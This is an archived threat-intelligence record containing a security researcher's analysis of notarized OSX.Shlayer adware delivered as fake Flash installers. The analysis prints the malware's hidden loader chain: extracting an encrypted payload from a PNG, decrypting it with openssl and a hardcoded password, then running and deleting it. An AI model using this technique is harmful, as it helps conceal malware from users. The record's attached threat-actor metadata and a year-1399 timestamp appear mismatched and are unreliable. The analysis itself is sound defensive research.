{
	"id": "164e6c2a-c106-4058-8b2d-9dad78344ed5",
	"created_at": "2026-04-06T00:15:06.38495Z",
	"updated_at": "2026-04-10T03:30:33.312992Z",
	"deleted_at": null,
	"sha1_hash": "4e429bb3b88032719ed18ea2bd7dda380bf7710d",
	"title": "Apple Approved Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5286780,
	"plain_text": "Apple Approved Malware\r\nArchived: 2026-04-05 19:45:03 UTC\r\nmalicious code ...now notarized!? #2020\r\nby: Patrick Wardle / August 30, 2020\r\nLove these blog posts and/or want to support my research and tools? You can support them via my Patreon page!\r\n📝 👾 Want to play along?\r\nI’ve added the samples (‘OSX.Shlayer’) to our malware collection (password: infect3d)\r\n…please don’t infect yourself!\r\nBackground\r\nIt wasn’t too long ago that Apple’s website stated:\r\n\"[Macs] doesn't get PC viruses. A Mac isn’t susceptible to the thousands of viruses plaguing Windows-based computers. That's thanks to built-in defenses in Mac OS X that keep you safe without any work on your part\" -Apple.com\r\nThe “truth” of this nuanced statement lies in the fact that, due to inherent cross-platform incompatibilities (not Apple’s “defenses”), a native Windows virus cannot directly execute on macOS.\r\nHowever, even this claim is rather subjective, as was highlighted in 2019 by a Windows adware specimen targeting macOS users. The adware was packaged with a cross-platform framework (Mono) that allowed Windows binaries (.exes) to “natively” run on macOS!\r\nhttps://objective-see.com/blog/blog_0x4E.html\r\nPage 1 of 13\n\nAnd, even back in 2012, thanks to Java, cross-platform malware could be found targeting both Windows and macOS.\r\nToday, malicious code targeting macOS, unfortunately, is far too common. Kaspersky, in a 2019 report titled “Threats to macOS users”, noted a sharp uptick in threats targeting Macs:\r\n\"Threats to macOS users\" (Kaspersky)\r\n…while Malwarebytes stated in their “2020 State of Malware Report”:\r\n\"And for the first time ever, Macs outpaced Windows PCs in number of threats detected per endpoint.\" -Malwarebytes\r\nThreats per endpoint, Macs vs. Windows (Malwarebytes)\r\nIt is important to note these statistics include both adware (and potentially unwanted programs). And the reality is, if a Mac user is infected with malicious code, more than likely it is not going to be some advanced nation-state backdoor, but rather adware (or malware that installs various adware). Unfortunately, such adware and adware campaigns are rather prolific, and their prevalence is only increasing as Macs become ever more popular:\r\n\"The vast majority of threats for macOS in 2019 were in the AdWare category.\" -Kaspersky\r\nIt is also important not to underestimate the potential impact of adware upon its victims. The noted security researcher Thomas Reed articulates this well in a recent writeup:\r\n\"However, adware and PUPs can actually be far more invasive and dangerous on the Mac than “real” malware. They can intercept and decrypt all network traffic, create hidden users with static passwords, make insecure changes to system settings, and generally dig their roots deep into the system so that it is incredibly challenging to eradicate completely.\" -Thomas Reed\r\nClearly, in order to protect both users and the perception of security, Apple had to take steps to address the ever rising tide of malicious code targeting macOS.\r\nTheir (most recent) answer? Code Notarization Requirements.\r\nNotarization\r\nThe main goal of notarization is to allow Apple to “scan …software for malicious content” before it is distributed to macOS users. The idea was that malicious code would, of course, not be notarized and thus the majority of attacks targeting macOS users (adware campaigns, etc.) would be thwarted.\r\nApple introduced notarization requirements in macOS 10.15 (Catalina), detailing the topic in an aptly named document, “Notarizing macOS Software”:\r\nIn short, developers must now submit their applications to Apple before distribution to macOS users. This ensures that Apple can inspect (and approve) all software before it is allowed to run on (recent versions of) macOS:\r\n\"Notarization gives users more confidence that the Developer ID-signed software you distribute has been checked by Apple for malicious components.\" -Apple.com\r\nIf software has not been notarized, it will be blocked by macOS (with no option to run it via the alert prompt):\r\nunnotarized software: blocked!\r\nThe following provides a conceptual overview of the notarization process, and its impact on both malware and hacking operations:\r\nWith the goal of stymieing the influx of malicious code targeting macOS, notarization seemed like a promising idea.\r\n…sadly, not all promises are kept.\r\nA Notarized Adware Campaign\r\nMany developers are familiar with Homebrew, hosted at brew.sh:\r\nthe (legitimate) Homebrew website\r\nOn Friday, twitter user Peter Dantini (@PokeCaptain) noticed that the website homebrew.sh (not to be confused with the legitimate Homebrew website brew.sh) was hosting an active adware campaign. If a user inadvertently visited homebrew.sh, after various redirects an update for “Adobe Flash Player” would be aggressively recommended:\r\n(fake) Adobe Flash Player update(s)\r\nKudos to Peter for uncovering this adware campaign, and sharing the details with me!\r\nMahalo Peter! 🙏🏽\r\nNormally such campaigns are rather prosaic and utilize unnotarized code. As such, they are normally stopped short in their tracks by Apple’s new notarization requirements. For example, here we have a similar adware campaign leveraging unnotarized payloads …that, as expected, macOS will block:\r\nunnotarized adware? blocked!\r\nNote that in the above alert, the only options are “Move to Trash” and “Cancel”. There is no option to allow the user to run the unnotarized software.\r\nInterestingly, Peter noticed the campaign originating from homebrew.sh leveraged adware payloads that were actually fully notarized! 😱\r\nWe can confirm the payloads are indeed notarized via the spctl command (note the \"source=Notarized Developer ID\"):\r\n$ spctl -a -vvv -t install /Volumes/Install/Installer.app\r\n/Volumes/Install/Installer.app: accepted\r\nsource=Notarized Developer ID\r\norigin=Developer ID Application: Morgan Sipe (4X5KZ42L4B)\r\n$ spctl -a -vvv -t install /Users/patrick/Downloads/Player.pkg\r\n/Users/patrick/Downloads/Player.pkg: accepted\r\nsource=Notarized Developer ID\r\norigin=Developer ID Installer: Darien Watkins (NC43XU5Z95)\r\nAs far as I know, this is a first: malicious code gaining Apple’s notarization “stamp of approval”.\r\nWhat does this mean?\r\nThese malicious payloads were submitted to Apple, prior to distribution.\r\nApple scanned them and, apparently detecting no malice, (inadvertently) notarized them.\r\nNow notarized, these malicious payloads are allowed to run …even on macOS Big Sur.\r\nAgain, due to their notarization status, users will (quite likely) fully trust these malicious samples.\r\nnotarized malware on Big Sur? ...yups\r\nTriaging the Payloads\r\nSo what are the notarized payloads?\r\n$ shasum *\r\n43a44d4f58774157857d04d67a9fef7045dacb2f AdobeFlashPlayer.dmg\r\nd28d75c9f61d20aa990e80e88ed8f3deb37b7f7f AdobeFlashPlayerInstaller.dmg\r\n52873957878e37d412cd5dabddfb770bcbdf5783 MediaPlayer.dmg\r\nb801963a180d253741be08dfbb7a5ed27964ac14 Player.pkg\r\n…they appear to be the rather infamous OSX.Shlayer malware.\r\nRunning the (notarized) payloads in an instrumented virtual machine captures (via our open-source ProcessMonitor) the execution of various shell commands via bash:\r\n# ProcessMonitor.app/Contents/MacOS/ProcessMonitor -pretty\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_EXEC\",\r\n \"process\" : {\r\n \"signing info (computed)\" : {\r\n \"signatureID\" : \"com.apple.bash\",\r\n ...\r\n ]\r\n },\r\n \"uid\" : 501,\r\n \"arguments\" : [\r\n \"sh\",\r\n \"-c\",\r\n \"tail -c +1381 \\\"/Volumes/Install/Installer.app/Contents/Resources/main.png\\\" | openssl enc -ae\r\n ],\r\n \"ppid\" : 1447,\r\n \"pid\" : 1546\r\n },\r\n \"timestamp\" : \"1399-06-04 08:18:33 +0000\"\r\n}\r\nLet’s break down these commands:\r\ntail -c +1381 \\\"/Volumes/Install/Installer.app/Contents/Resources/main.png\\\"\r\nExtracts bytes from main.png starting at offset 1381\r\nopenssl enc -aes-256-cbc -salt -md md5 -d -A -base64 -out /tmp/ZQEifWNV2l -pass \\\"pass:0.6effariGgninthgiL0.6\\\r\nDecodes the output from the tail command into a file: /tmp/ZQEifWNV2l\r\nchmod 777 /tmp/ZQEifWNV2l\r\nChanges the file mode to (amongst other things) fully accessible and executable.\r\n/tmp/ZQEifWNV2l \\\"/Volumes/Install/Installer.app/Contents/MacOS/pine\\\"\r\nExecutes the file ZQEifWNV2l, passing in Installer.app/... as a command line argument.\r\nrm -rf /tmp/ZQEifWNV2l\r\nDeletes the ZQEifWNV2l file.\r\nThe use of openssl in this manner is a clear indicator of OSX.Shlayer (as is the use of fake Flash installers, and other IoCs).\r\nOlder variants of OSX.Shlayer used a slightly different syntax:\r\nopenssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:2833846567 \u003c\"$fileDir\"/Resources/enc\r\nOSX.Shlayer is massively common, with Kaspersky noting it may be the most prevalent malware infecting macOS systems:\r\n\"As for the malware threats, the Shlayer family, which masquerades as Adobe Flash Player or an update for it, has been the most prevalent.\" -Kaspersky\r\nAnd what is the ultimate goal of OSX.Shlayer? As noted in my previous analysis of this malware:\r\n\"The goal of the malware [OSX.Shlayer] is to download and persistently install various macOS adware.\" -The Mac Malware of 2018 (OSX.Shlayer)\r\nRecall this variant of OSX.Shlayer decoded and executed a binary named ZQEifWNV2l. Uploading and scanning the ZQEifWNV2l file on VirusTotal confirms that it is indeed adware:\r\nOSX.Shlayer's payload? Bundlore\r\n…specifically (a variant?) of the persistent Bundlore adware.\r\nOSX.Shlayer has been known to be quite innovative (i.e. with manual methods of bypassing recent macOS security mechanisms):\r\nAs such, it is not too surprising that this insidious malware has continued to evolve to trivially side-step Apple’s best efforts.\r\nConclusion\r\nIn Apple’s own words, notarization was supposed to “give users more confidence that [software] …has been checked by Apple for malicious components.”\r\nUnfortunately a system that promises trust, yet fails to deliver, may ultimately put users at more risk. How so? If Mac users buy into Apple’s claims, they are likely to fully trust any and all notarized software. This is extremely problematic as known malicious software (such as OSX.Shlayer) is already (trivially?) gaining such notarization!\r\nTo Apple’s credit, once I reported the notarized payloads, they were quick to revoke their certificates (and thus rescind their notarization status):\r\n$ spctl -a -vvv -t install /Volumes/Install/Installer.app\r\n/Volumes/Install/Installer.app: notarization indicates this code has been revoked\r\nThus, these malicious payloads will now no longer run on macOS. Hooray!\r\n(previously notarized) payloads, now blocked!\r\n…still, the fact that known malware got notarized in the first place raises many questions 🤔\r\nUpdate\r\nAs noted, Apple (quickly-ish) revoked the Developer code-signing certificate(s) that were used to sign the malicious payloads. This occurred on Friday, Aug. 28th.\r\nInterestingly, as of Sunday (Aug 30th) the adware campaign was still live and serving up new payloads. Unfortunately these new payloads are (still) notarized:\r\n$ spctl -a -vvv -t install /Volumes/Installer/Installer.app\r\n/Volumes/Installer/Installer.app: accepted\r\nsource=Notarized Developer ID\r\norigin=Developer ID Application: Aimee Shorter (73KF97486K)\r\nWhich means even on Big Sur, they will (still) be allowed to run:\r\nBig Sur, prompts, but allows\r\nIf we extract the code-signing time stamp, we can see this (new) payload was signed on Friday PM (Aug 28, 2020 at 1:04:04 PM HST) …likely after Apple’s initial “response”?\r\n$ codesign -dvvv /Volumes/Installer/Installer.app\r\nExecutable=/Volumes/Installer/Installer.app/Contents/MacOS/Ethernet\r\nIdentifier=com.Ethernet.bundle.installer\r\nFormat=app bundle with Mach-O thin (x86_64)\r\n...\r\nAuthority=Developer ID Application: Aimee Shorter (73KF97486K)\r\nAuthority=Developer ID Certification Authority\r\nAuthority=Apple Root CA\r\nTimestamp=Aug 28, 2020 at 1:04:04 PM\r\nBoth the old and “new” payload(s) appear to be nearly identical, containing OSX.Shlayer packaged with the Bundlore adware.\r\nHowever, the attackers’ ability to agilely continue their attack (with other notarized payloads) is noteworthy.\r\nClearly in the never ending cat \u0026 mouse game between the attackers and Apple, the attackers are currently (still) winning. 😢\r\n💕 Support Us:\r\nLove these blog posts? You can support them via my Patreon page!\r\nSource: https://objective-see.com/blog/blog_0x4E.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://objective-see.com/blog/blog_0x4E.html"
	],
	"report_names": [
		"blog_0x4E.html"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434506,
	"ts_updated_at": 1775791833,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4e429bb3b88032719ed18ea2bd7dda380bf7710d.pdf",
		"text": "https://archive.orkl.eu/4e429bb3b88032719ed18ea2bd7dda380bf7710d.txt",
		"img": "https://archive.orkl.eu/4e429bb3b88032719ed18ea2bd7dda380bf7710d.jpg"
	}
}